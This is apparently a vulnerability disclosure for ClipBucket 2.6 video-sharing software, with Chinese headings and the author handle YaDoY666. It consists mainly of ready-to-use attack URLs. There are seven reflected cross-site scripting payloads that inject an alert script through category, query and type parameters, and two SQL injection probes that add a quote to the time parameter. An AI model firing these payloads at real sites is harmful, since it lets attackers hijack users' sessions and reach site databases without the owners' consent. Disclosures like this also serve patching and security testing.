标题: Multiple Vulnerability on ClipBucket 2.6
作者: YaDoY666
开发这网站:
程序: Clip Bucket (Open Source Video Sharing)
影响版本: 2.6
 
Cross Site Scripting
====================
 
[[=]]   /[path]/channels.php
[[=]]   /[path]/collections.php
[[=]]   /[path]/groups.php
[[=]]   /[path]/search_result.php
[[=]]   /[path]/videos.php
[[=]]   /[path]/view_collection.php
[[=]]   /[path]/view_item.php
例子 :
/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
 
SQL Injection
==============
 
[[=]]   /[path]/channels.php
[[=]]   /[path]/videos.php
 
示例测试:
/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27